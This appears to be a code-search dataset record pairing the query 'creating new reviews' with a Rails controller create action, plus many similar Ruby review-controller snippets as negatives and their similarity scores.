"def index\n @reviews = Review.all\n @latest_reviews = Review.latest\n @highest_score_reviews = Review.highest_score\n @lowest_score_reviews = Review.lowest_score\n end",
"def index\n if params[:site].blank?\n\t\t# get all reviews and their corresponding sites and order them descending\n\t\t@reviews = Review.joins(:site).order(created_at: :desc).includes(:site)\n\telse\n\t\t# for filtering by site in review list\n\t\t# get all reviews which belong to site name in parameter, order them descending and also get corresponding site\n\t\t@reviews = Review.joins(:site).where( sites: { name: params[:site] }).order(created_at: :desc).includes(:site)\n\tend\n end",
"def show\n #this is going to be the individual review page using no. in db row using params array of :id. make sure we now create view page\n @review = Review.find(params[:id])\n end",
"def show\n @review = Review.find(params[:id])\n end",
"def show\n @review = Review.find(params[:id])\n end"
] |
[
"0.7431748",
"0.74059606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7329606",
"0.7202078",
"0.7202078",
"0.7161231",
"0.711936",
"0.7092843",
"0.70846015",
"0.70543146",
"0.7024695",
"0.6999844",
"0.69851214",
"0.69833916",
"0.69560015",
"0.6955459",
"0.6949214",
"0.69076777",
"0.6897412",
"0.6870663",
"0.6865626",
"0.6859445",
"0.6856105",
"0.6850809",
"0.6784931",
"0.6777847",
"0.6763519",
"0.6745613",
"0.6734969",
"0.6724279",
"0.6719189",
"0.6717712",
"0.6717425",
"0.66831225",
"0.66778934",
"0.66677725",
"0.6636018",
"0.66290253",
"0.6626681",
"0.6617004",
"0.6613679",
"0.66021645",
"0.65991443",
"0.65933853",
"0.65668505",
"0.65634364",
"0.6554638",
"0.6554638",
"0.6545174",
"0.6543651",
"0.6480624",
"0.64608485",
"0.64511836",
"0.64478886",
"0.6447751",
"0.64420617",
"0.6442054",
"0.6430952",
"0.6405244",
"0.6404096",
"0.64039975",
"0.6402533",
"0.6398819",
"0.6394077",
"0.63653624",
"0.63571805",
"0.6346248",
"0.634522",
"0.6344518",
"0.6343105",
"0.6337448",
"0.6335547",
"0.63201207",
"0.63195664",
"0.63168174",
"0.63110757",
"0.63098454",
"0.630282",
"0.62988496",
"0.62926656",
"0.6263686",
"0.6256343",
"0.62516207",
"0.6251233",
"0.624192",
"0.6241366",
"0.6240407",
"0.6235066",
"0.6235066"
] |
0.74671495
|
0
|
this method takes care of creating new reviews
|
def create
@reviews = @share.reviews.order(priority: :asc)
@reviewToAlter = @share.reviews.new(review_params)
if @reviewToAlter.save
redirect_to share_reviews_path(@share), notice: "Review saved!"
else
flash[:alert] = "Error : #{@reviewToAlter.errors.full_messages.to_sentence}"
render :index
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n @review = Review.new(review_params)\n if @review.save\n redirect_to reviews_path\n else\n render 'new'\n end\n end",
"def create\n review = course.reviews.new(review_params)\n \n if review.save\n render json: ReviewSerializer.new(review).serialized_json\n else\n render json: { error: review.errors.messages }, status: 422\n end\n end",
"def create\n @review = Review.new(review_params)\n current_user.reviews << @review\n respond_to do |format|\n if @review.save\n format.json { render :show, status: :created, location: @review }\n else\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # Creates a new review & sends them back to their updated page\n review = current_user.reviews.create(review_params)\n if review.save\n redirect_to :back\n else\n redirect_to product_path(id: params[:product_id])\n end\n end",
"def create\n\t\t\t\t@review = DriverReview.new(create_driver_review_params)\n\t\t\t\t@review.driver_id = @request.driver_id\n\t\t\t\t# render_invalid_action(@review) unless @review.save\n\t\t\t\t@review.save!\n\t\t\t\tlogger.debug @review.errors.messages\t\t\t\t\n\t\t\tend",
"def create\n @review = reviewable.reviews.build(params[:review])\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to reviewable_review_url(reviewable, @review), notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = current_author.reviews.create(review_params)\n render json: @review, status: 201\n end",
"def create\n @review = Review.new(review_params)\n @review.exceptional ||= 0\n if @review.save\n @apn.update_attribute(:reviewed, true)\n link = reviews_path\n name = @apn.profile.first_name.capitalize + \" \".to_s + @apn.profile.last_name.capitalize\n redirect_to new_review_path, notice: (\"#{name} successfully reviewed.\" +\n \" New application loaded. If you're feeling lazy, <a href='#{link}'>\" +\n \"go to the Dashboard</a>\").html_safe\n else\n render action: \"new\", alert: \"something went wrong with submitting the review\"\n end\n end",
"def create\n if current_user\n @review = current_user.reviews.build(params[:review])\n\n respond_to do |format|\n if @review.save\n flash[:success] = 'Запись успешно добавлена!'\n format.html { redirect_to reviews_path }\n format.json { render json: @review, status: :created, location: reviews_path }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n else\n flash[:error] = 'Вы должны войти в систему!'\n redirect_to root_path\n end\n end",
"def create\n\t\t@review = Review.new(review_params)\n\t\t@review.user_id = current_user.id\n\t\trespond_to do |format|\n\t\t\tif @review.save\n\t\t\t\t@reviews = Review.order(:heading).paginate(page: params[:page], per_page: 18)\n\t\t\t\tformat.html { redirect_to @review; flash[:success]= 'review was successfully created.' }\n\t\t\t\tformat.json { render :show, status: :created, location: @review }\n\t\t\t\tformat.js\n\t\t\telse\n\t\t\t\tformat.html { render :new }\n\t\t\t\tformat.json { render json: @review.errors, status: :unprocessable_entity }\n\t\t\t\tformat.js\n\t\t\tend\n\t\tend\n\tend",
"def create\n @review = current_user.reviews.build(review_params)\n \n if @review.save\n flash[:success] = 'レビューを投稿しました。'\n redirect_to root_url\n else\n @reviews = current_user.reviews.order(id: :desc).page(params[:page])\n flash.now[:danger] = 'レビューの投稿に失敗しました。'\n render '/reviews'\n end\n end",
"def create\n @product = Product.find params[:product_id] \n @review = @product.reviews.create(review_params)\n if @review.save\n redirect_to :back\n end\n end",
"def create\n item = Item.find(params[:review][:rateable_id])\n @review = item.reviews.new\n @review.user_id = current_user.id\n @review.rating = params[:review][:rating]\n @review.comment = params[:review][:comment]\n if @review.save\n redirect_to item_path(item)\n else\n flash[:alet] = \"There was a problem creating the review\"\n render :new\n end\n end",
"def create\n\t\t@review = Review.new(review_params)\n\t\t# ensure that there is a description\n\t\tif @review.description.blank?\n\t\t\tflash[:error] = 'Your review must have a description!'\n\t\t\tredirect_to new_review_path\n\t\telse\n\t\t\t# continue with rest of saving\n\t\t\t@review.user = current_user #.id?\n\t\t\tif @review.save\n\t\t\t\tredirect_to trip_path(id: @review.trip.id)\n\t\t\telse\n\t\t\t\tflash[:error] = @review.errors.full_messages.to_sentence\n\t\t\t\tredirect_to new_review_path\n\t\t\tend\n\t\tend\n\tend",
"def create\r\n _params = review_init_params\r\n _params[:id] = SecurityManager.md5(\"#{@user.id}_#{@task.id}\")\r\n _params[:score] = _params[:score].to_i\r\n _params[:author_id] = @user.id\r\n\r\n begin\r\n @review = @task.reviews.create(_params)\r\n rescue Mongo::Error::OperationFailure\r\n return bad_request(\"duplicated\")\r\n end\r\n\r\n respond_to do |format|\r\n if @review.save\r\n format.html { redirect_to '/task' }\r\n else\r\n return unprocessable_entity\r\n end\r\n end\r\n end",
"def create \n @refrigerator = Refrigerator.find(params[:refrigerator_id])\n @review = Review.create(create_update_params)\n @refrigerator.reviews << @review\n\n if @review.save!\n\n flash[:notice] = 'Review successfully created.'\n redirect_to refrigerator_path(params[:refrigerator_id])\n else\n flash[:notice] = 'Could not create new review.'\n redirect_to (new_refrigerator_review_path(@refrigerator))\n end\n end",
"def create\n @review = @story.reviews.new(review_params)\n if @review.save\n redirect_to @review.story, notice: 'Review was successfully created.'\n else\n render :new\n end\n end",
"def create\n @review = @post.reviews.where(user_id: current_user.id).create(params[:review])\n respond_with @post, @review, location: post_path(@post, anchor: \"review_#{@review.id}\")\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if !!@review && current_user\n current_user.reviews << @review\n @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\t\t@review = Review.new(params[:review])\n\t\t@review.establishment = Establishment.find(params[:establishment])\n\t\t@review.category = Category.find(params[:category])\n\t\t@review.clientele = Clientele.find(params[:clientele])\n\t\t@review.sound_level = SoundLevel.find(params[:sound_level])\n\t\t@review.hygiene = Hygiene.find(params[:hygiene])\n\t\t@review.rating = Rating.find(params[:rating])\n\n\t\trespond_to do |format|\n\t\t\tif @review.save\n\t\t\t\tformat.html { redirect_to(@review, :notice => 'Review was successfully created.') }\n\t\t\t\tformat.xml { render :xml => @review, :status => :created, :location => @review }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"new\" }\n\t\t\t\tformat.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: \"レビューが作成されました\" }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #binding.pry\n review = Review.new(review_params) \n if review.save\n render json: ReviewSerializer.new(review)\n else\n render json: {errors: review.errors.full_messages}\n end\n end",
"def create\n # any registered user can add a review\n unless current_user.is_general_user?\n redirect_to denied_path\n return\n end\n\n @review = Review.new(params[:review])\n @review.user_id = current_user.id\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to(@review, :notice => 'Review was successfully created.') }\n format.xml { render :xml => @review, :status => :created, :location => @review }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(params[:review])\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n respond_to do |format|\n if Review.validate(@review) and @review.save\n format.html { redirect_to bookings_path, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n flash[:notice] = \"You are submitting your review multiple times. Aborting\"\n format.html { redirect_to bookings_path }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render action: 'show', status: :created, location: @review }\n else\n format.html { render action: 'new' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n if @review.save\n render json: @review, status: :created, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def create\n @review = Review.new(review_params)\n\n if @review.save\n render json: @review, status: :created, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def create\n @review = Review.new(review_params)\n\n if @review.save\n render json: @review, status: :created, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def create\n review_params[:rating].sub!(/\\s*[^0-9]*\\z/, '') if review_params[:rating].present?\n\n @review = Spree::Review.new(review_params)\n @review.product = @product\n @review.user = spree_current_user if spree_user_signed_in?\n @review.ip_address = request.remote_ip\n @review.locale = I18n.locale.to_s if Spree::Reviews::Config[:track_locale]\n # Handle images\n params[:review][:images]&.each do |image|\n @review.images.new(attachment: image) if image.present?\n end\n\n authorize! :create, @review\n if @review.save\n flash[:notice] = I18n.t('spree.review_successfully_submitted')\n redirect_to spree.product_path(@product)\n else\n render :new\n end\n end",
"def create \n @review = Review.new\n @review.rateable_type = params[:review][:rateable_type]\n @review.rateable_id = params[:review][:rateable_id]\n @review.user_id = current_user.id \n @review.rating = params[:review][:rating]\n @review.comment = params[:review][:comment]\n if @review.save\n redirect_to course_path(@review.rateable_id)\n else \n flash[:alert] = \"Opps, something went wrong when creating your review\"\n redirect_to courses_path\n end \n end",
"def create\n current_user = User.find(session_params)\n @review = Review.new(\n user_id: current_user.id,\n product_id: params[:product_id],\n rating: params[:rating],\n description: params[:review][:description]\n )\n if @review.valid?\n @review.save\n redirect_to product_path(params[:product_id])\n else\n redirect_to root_path\n end\n end",
"def create\n @post = Post.new(post_params)\n @post.user_id=current_user.id\n create_review(@post)\n end",
"def create\n @review = Review.new(params[:review])\n if @review.save\n flash[:notice] = \"Review Created\"\n redirect_to \"/products\"\n else\n render \"create\"\n end\n end",
"def create\n @user = current_user\n @review = @user.reviews.build(review_params)\n if @user.save\n render json: @review\n end\n end",
"def new\n\t\tif !authenticate_user!(\"You must be logged in to write a review. Login now or sign up!\", true) \n\t\t\treturn \n\t\tend\t\t\n\t\t@store_review = @store.store_reviews.build\t\t\n\t\trender layout: false\t\t\n\tend",
"def create\n\t\t@book_review = BookReview.new(params[:book_review])\n\t\t@book_review.user_id = current_user.id\n\t\t@book_review.book_id = params[:book_id]\n\n\t\trespond_to do |format|\n\t\t\tif @book_review.save\n\t\t\t\tformat.html { redirect_to @book_review, :notice => 'Book review was successfully created.' }\n\t\t\t\tformat.json { render :json => @book_review, :status => :created, :location => @book_review }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"new\" }\n\t\t\t\tformat.json { render :json => @book_review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def create\n params[:review][:rating].sub!(/\\s*[^0-9]*\\z/, '') unless params[:review][:rating].blank?\n\n @review = Designerreview.new(review_params)\n @review.designer = @designer\n @review.user = spree_current_user if spree_user_signed_in?\n @review.ip_address = request.remote_ip\n @review.locale = I18n.locale.to_s if Designerreviews::Config[:track_locale]\n\n authorize! :create, @review\n if @review.save\n flash[:notice] = Spree.t(:review_successfully_submitted)\n redirect_to designer_path(@designer)\n else\n render :new\n end\n end",
"def save_review\r\n return unless self.review\r\n begin\r\n r = JSON.parse self.review\r\n c = Comment.new\r\n c.id = r['id']\r\n c.content = r['content']\r\n c.user_id = r['user']['id']\r\n c.app_id = r['app']['id']\r\n c.created_at = Time.at r['created_at']\r\n c.model = r['model']\r\n c.sdk = r['sdk']\r\n c.image = r['image']\r\n c.image_size = r['image_size']\r\n c.sns_status_id = r['sns_status_id']\r\n c.sns_id = r['sns_id'] \r\n c.in_reply_to_id = r['in_reply_to_id']\r\n c.save\r\n rescue\r\n end\r\n end",
"def create\n @review = current_user.reviews.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to place_path(@review.place), notice: 'Review was successfully created.' }\n else\n format.html { redirect_to root_path }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user = current_user\n\n if @review.save\n render :show, status: :created, location: @review\n else\n render json: { Error: @review.errors }, status: :unprocessable_entity\n end\n end",
"def create\n @review = Review.new(params[:review])\n\n if @review.save\n redirect_to contact_path, :notice => \"Uw waardering is geplaatst, hartelijk dank!\"\n else\n\t\t\tredirect_to contact_path, :notice => \"Uw waardering kan op dit moment niet geplaatst worden, probeer het later nog eens.\"\n end\n end",
"def create\n @venue_review = @venue.venue_reviews.new(params[:venue_review])\n @venue_review.added_by = current_user.id\n respond_to do |format|\n if @venue.venue_reviews << @venue_review\n flash[:notice] = 'Thank you for your valuable review.'\n format.html { redirect_to(venue_path(@venue)) }\n format.xml { render :xml => @venue_review, :status => :created, :location => @venue_review }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @venue_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @shop = Shop.find(params[:shop_id])\n @review = @shop.reviews.create(reviewer: params[:review][:reviewer], rate: params[:review][:rate], body: params[:review][:body])\n\n if @review.save\n puts \"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\"\n flash[:notice] = \"レビューの投稿が完了しました\"\n redirect_to shop_path(@shop)\n\n else\n redirect_to shop_path(@shop)\n flash[:notice] = \"レビューの投稿に失敗しました\"\n end\n\n\n end",
"def require_new_review\n\t\t@review = @profile.reviews.build\n\tend",
"def create\n \n @venue = Venue.find(params[:venue_id])\n #@venue = Venue.find_by_venue_id(params[:venue_id])\n @review = @venue.reviews.create(params[:review])\n #redirect_to venue_show_path(params[@venue.venue_id])\n @review.venue_id = params[:venue_id]\n #@review = @restroom.reviews.build(params[:review])\n #@review.save\n @review.user = current_user\n @review.venue = Venue.find(params[:venue_id])\n \n respond_to do |format|\n if @review.save\n format.html { redirect_to venue_show_path(params[@venue.id], :venue_id => @venue.venue_id ), :notice => 'Your review was successfully posted.'}\n format.xml { render :xml => @venue, :status => :created, :location => @venue }\n else\n format.html { redirect_to(@venue, :notice => \n 'Review could not be saved. Please fill in all fields')}\n format.xml { render :xml => @venue.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n @product = Product.find(@review.product_id)\n if @review.save\n flash[:success] = \"Review created!\"\n redirect_to @product\n else\n @reviews = @product.reviews.paginate(page: params[:page])\n render template: \"products/show\"\n end\n end",
"def new\n\t\t@review = Review.new\n\tend",
"def create\n @review = Presentation.find(params[:id]).reviews.build(reviews_params)\n @review.user_id = current_user.id\n @review.save\n redirect_to current_user\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n @review.movie_id = @movie.id\n\n respond_to do |format|\n #If the review is saved, it redirects to the movie page and shows the notice.\n if @review.save\n format.html { redirect_to @movie, notice: t('review.create') }\n format.json { render :show, status: :created, location: @review }\n #If the review is not saved, it refreshes the create review page.\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @product = Product.find(params[:product_id])\n\n @review = @product.reviews.new(review_params)\n\n @review.user = current_user\n\n if @review.save\n redirect_to @product, notice: 'Review was created successfully.'\n else\n redirect_to @product, notice: 'Review failed to save.'\n end\n end",
"def create\n\n @product = Product.find( params[:product_id])\n @product.reviews.create(review_params)\n @product.save\n\n if current_user.try(:admin?)\n redirect_to product_path(@product)\n else\n redirect_to store_show_path(@product)\n end\n\n @review = Review.new(review_params)\n\n end",
"def create\n\t\t# Review properties filled using user inputs from view\n\t\t@review = Review.create(review_params)\n\t\t# Linking review to car\n\t\t@review.car_id = @car.id\n\t\t# Linking review to user \n\t\t@review.user_id = current_user.id\n\t\t# Attempts to save review\n\t\tif @review.save\n\t\t\t# Once saved, redirected to show page of car, review should be visible\n\t\t\tredirect_to car_path(@car)\n\t\telse\n\t\t\t# If not saved, go to new review page again\n\t\t\trender 'new'\n\t\tend\n\tend",
"def create\n @reviews_and_rating = ReviewsAndRating.new(reviews_and_rating_params)\n\n respond_to do |format|\n if @reviews_and_rating.save\n format.html { redirect_to @reviews_and_rating, notice: 'Reviews and rating was successfully created.' }\n format.json { render :show, status: :created, location: @reviews_and_rating }\n else\n format.html { render :new }\n format.json { render json: @reviews_and_rating.errors, status: :unprocessable_entity }\n end\n end\n end",
"def review\n render_create @order.build_review review_params\n rescue ActiveRecord::RecordNotSaved\n render_error I18n.t('review_exist'), :unprocessable_entity\n end",
"def create\n @video = Video.find(params[:id])\n @review = Review.new(review_params.merge!(creator: current_user, video: @video))\n\n if @review.save\n flash[:success] = \"You have posted the review\"\n redirect_to video_path\n else\n @reviews = @video.reviews\n flash.now[:danger] = \"There was a problem with your submission\"\n render 'videos/show'\n end\n end",
"def create\n @review = @place.reviews.new(params[:review])\n @review.user = current_user\n respond_to do |format|\n if @review.save\n format.html { redirect_to place_path(@place), notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { redirect_to place_path(@place, :anchor => \"review\"), notice: 'Please enter your review!!.' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to dashboard_path, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @review = Review.new(params[:review])\n @review.review_date = Time.now\n @review.user_id = current_user.id\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to place_url(@review.place), notice: 'Review was successfully created.' }\n format.json { render json: @review, status: :created, location: @review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @idea = Idea.find params[:idea_id]\n review_params = params.require(:review).permit(:body)\n @review = Review.new review_params\n @review.idea = @idea\n @review.user = current_user\n\n if @review.save\n redirect_to idea_path(@idea), notice: \"Review created!\"\n else\n flash[:alert] = 'Problem creating review'\n render 'ideas/show'\n end\n end",
"def create_review(booking, options = {})\n post(\"bookings/#{booking}/reviews\", reviews: [options]).pop\n end",
"def add_review(restaurant, content)\n new_review = Review.new(restaurant, content)\n new_review.customer = self\n new_review.restaurant = restaurant\n end",
"def create\n @review = Review.new(review_params)\n\t@review.user_id = current_user.id\n\t\n\t# used for partials rendering in SPA\n\t@site = Site.find(@review.site_id)\n\t@sites = Site.all\n\t@reviews = Review.where(site_id: @site.id).order(\"created_at DESC\")\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n\t\tformat.js\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n\t\tformat.js { render 'shared/errors' }\n end\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n \n #유저는 한 식당에 한번의 리뷰만 쓸 수 있다.\n # if current_user.reviews.restaurant_id?\n # redirect_to @review.errors,flash:{note: '리뷰는 한번만.'}\n # else\n # @review.save\n # redirect_to @review,flash:{success: 'Review was successfully created.'}\n # end\n \n if @review.save\n # redirect_to @review, flash:{success: 'Review was successfully created.'}\n redirect_to restaurant_url(@review.restaurant_id), flash:{success: 'Review was successfully created.'}\n else\n render :new\n end\n \n \n end",
"def create\n pr = params[:review]\n review = Review.new\n \n if review.cadastrar(current_user, pr[:project_id], pr[:tipo], pr[:texto])\n redirect_to project_path(review.project_id), :notice => 'Revisao Cadastrada Com Sucesso.'\n else\n flash[:error] = \"Revisao Nao Cadastrada #{review.errors.messages}.\"\n redirect_to project_path(review.project_id)\n end\n end",
"def post_review\n @review = Review.new\n @review.title = params[:title]\n @review.description = params[:description]\n @review.name = params[:name]\n @review.user_id = User.find(session[:user_id]).id\n @review.rating = params[:rating]\n @review.listing = params[:listing]\n @review.save()\n # flash[:notice] = \"Review added successfully.\"\n redirect_to :action => :listing, :id => params[:listing]\n end",
"def create\n @review = @publication.reviews.new(review_params)\n\n respond_to do |format|\n if @review.save\n format.html { redirect_to @review.publication, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_review(restaurant, content)\n Review.new(self, restaurant, content)\n end",
"def create\n @review = Review.new(review_params)\n\n if !params[:course_id].blank? && !params[:professor_id].blank?\n @review.course_id = params[:course_id]\n @review.professor_id = params[:professor_id]\n @review.authuser_id = current_user.id\n respond_to do |format|\n if @review.save\n format.html do\n redirect_to professor_course_path(\n @review.professor_id,\n @review.course_id\n ),\n notice: 'Your review was submitted'\n end\n format.json { render :show, status: :created, location: @review }\n else\n @professors = load_professors\n @courses = load_courses\n format.html { render :new }\n format.json do\n render json: @review.errors, status: :unprocessable_entity\n end\n end\n end\n else\n redirect_to new_review_path, notice: 'Fill out all required fields'\n end\n end",
"def create\n @review = Review.new(params[:review])\n @review.user = current_user\n\n respond_to do |format|\n if @review.save\n flash[:notice] = 'Review was successfully created.'\n format.html { redirect_to(@review) }\n format.xml { render :xml => @review, :status => :created, :location => @review }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @listing = List.find(params[:list_id])\n #@user = current_user\n @review = current_user.reviews.build(params[:review])\n @review.list_id = @listing.id\n #@review = @listing.reviews.build(params[:review])\n #@review.update_attributes(:user_id => @user)\n \n respond_to do |format|\n if (@review.save)\n format.html { redirect_to(@listing) } #, :notice => 'Your review was successfully added.') }\n format.xml { render :xml => @listing, :status => :created, :location => @listing }\n #format.html { redirect_to(@listing, :notice => 'Review was successfully created.') }\n #format.xml { render :xml => @listing, :status => :created, :location => @listing }\n #redirect_to @listing\n else \n format.html { redirect_to(@listing) } #, :notice => 'Your review was not added.') }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n #flash[:error] = \"The review could not be created because there were some errors..........\"\n #redirect_to @listing\n end\n end\n end",
"def create\n if params[:user_id] && params[:recruiter_id] && params[:review]\n user = User.find(params[:user_id])\n # puts user\n recruiter = Recruiter.find(params[:recruiter_id])\n # puts recruiter\n ################################\n params[\"got_interview\"] ? got_interview = params[\"got_interview\"] : got_interview = false\n params[\"got_job\"] ? got_job = params[\"got_job\"] : got_job = false\n got_job ? got_interview = true : \"null\" #if got job then must have had interview\n params[\"rating\"] ? rating = params[\"rating\"] : rating = 0 #0 means not rated\n params[\"recommended\"] ? recommended = params[\"recommended\"] : recommended = false\n params[\"ghoster\"] ? ghoster = params[\"ghoster\"] : ghoster = false\n # puts \"*********$\"\n # puts params\n # puts recommended\n # puts params[:recommended]\n # puts \"***************$\"\n review = Review.new(\n user_id: user.id,\n recruiter_id: recruiter.id,\n review: params[\"review\"],\n got_interview: got_interview,\n got_job: got_job,\n rating: rating,\n recommended: recommended,\n ghoster: ghoster\n ) #Review.new\n\n if review.save\n render json: {\"POSTED REVIEW\": \"ok\"} #works\n else\n render json: {\"error\": \"ERROR SAVE POSTED REVIEW\"}\n end\n ################################\n # render json: {\"POSTED REVIEW\": \"ok\"} #works\n else\n render json: {\"error\": \"no user_id or recruiter_id or review\"}\n end # if params[:user_id]\n end",
"def create\n @recipe = Recipe.find params[:recipe_id]\n review = Review.new review_params\n review.recipe = @recipe\n review.user = current_user\n if review.save\n render json:{id: review.id}\n else \n render(json: {status: 422},\n status: 422 )\n end\n end",
"def create\n @review = Review.new(review_params)\n\n respond_to do |format|\n if @review.save\n # TODO redirect to page that shows what their review will look like. \n format.html { redirect_to thanks_path, notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n final_set = []\n params['doctors_review'].permit!\n doctors_id = params['doctors_review']['doctors_id']\n specialties_id = DoctorsSpecialty.where(doctors_id: doctors_id).first\n .specialties_id\n specialty = Specialty.find(specialties_id)\n unless specialties_id.nil?\n params['doctors_review']['specialties_id'] = specialties_id\n end\n @doctors_reviews = DoctorsReview.new(params['doctors_review'])\n if @doctors_reviews.save\n rating = params['doctors_review']['rating']\n unless rating.nil?\n all_reviews = DoctorsReview.where(specialties_id: specialties_id)\n .where('rating >= ?', rating).order('rating')\n all_reviews&.each do |review|\n doctor = Doctor.find(review['doctors_id'])\n recommendations = { specialty: specialty.name,\n doctor: doctor.name,\n rating: review.rating,\n comments: review.comments\n }\n final_set << recommendations\n end\n end\n final_set\n else\n @doctors_reviews.errors.full_messages\n end\n end",
"def create\n @user = User.find(params[:id])\n @user.reviews.push(current_user)\n redirect_to reviews_path\n end",
"def create\n @item_review = ItemReview.new(item_review_params)\n\n respond_to do |format|\n if @item_review.save\n format.html { redirect_to @item_review, notice: 'Item review was successfully created.' }\n format.json { render :show, status: :created, location: @item_review }\n else\n format.html { render :new }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # 今日振り返りしたかの確認\n review = Review.where(user_id: current_user.id, created_at: Time.current.at_beginning_of_day..Time.current.at_end_of_day)\n\n if review.exists?\n review.update(review_params)\n redirect_to user_path(current_user.id)\n flash[:notice] = \"振り返りの更新に成功しました。\"\n #TODO エラーメッセージ\n # respond_to do |format|\n # format.html { redirect_to review, notice: \"振り返りの更新に成功しました。\" }\n # format.json { render :show, status: :ok, location: review }\n # end\n else\n\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n respond_to do |format|\n if @review.save\n # 目標達成で5pt, タスク達成で2pt, 振り返り投稿で1pt、自分のレベルの10倍のポイントがたまるとレベルアップ\n if Goal.goal_point(current_user) + Task.task_point(current_user) + Review.review_point(current_user) > LEVEL_UP_POINT*current_user.level\n # レベル+1\n current_user.upgrade_level\n flash[:notice] = \"レベル「+1」アップ 、現在のレベルは#{current_user.level}です。\"\n end\n format.html { redirect_to @review, notice: \"振り返りの作成に成功しました。\" }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end\n end",
"def create\n @book_review = BookReview.new(params[:book_review])\n\n respond_to do |format|\n if @book_review.save\n format.html { redirect_to @book_review, notice: 'Book review was successfully created.' }\n format.json { render json: @book_review, status: :created, location: @book_review }\n else\n format.html { render action: \"new\" }\n format.json { render json: @book_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def review\n @users = User.all\n @review = Review.new\n end",
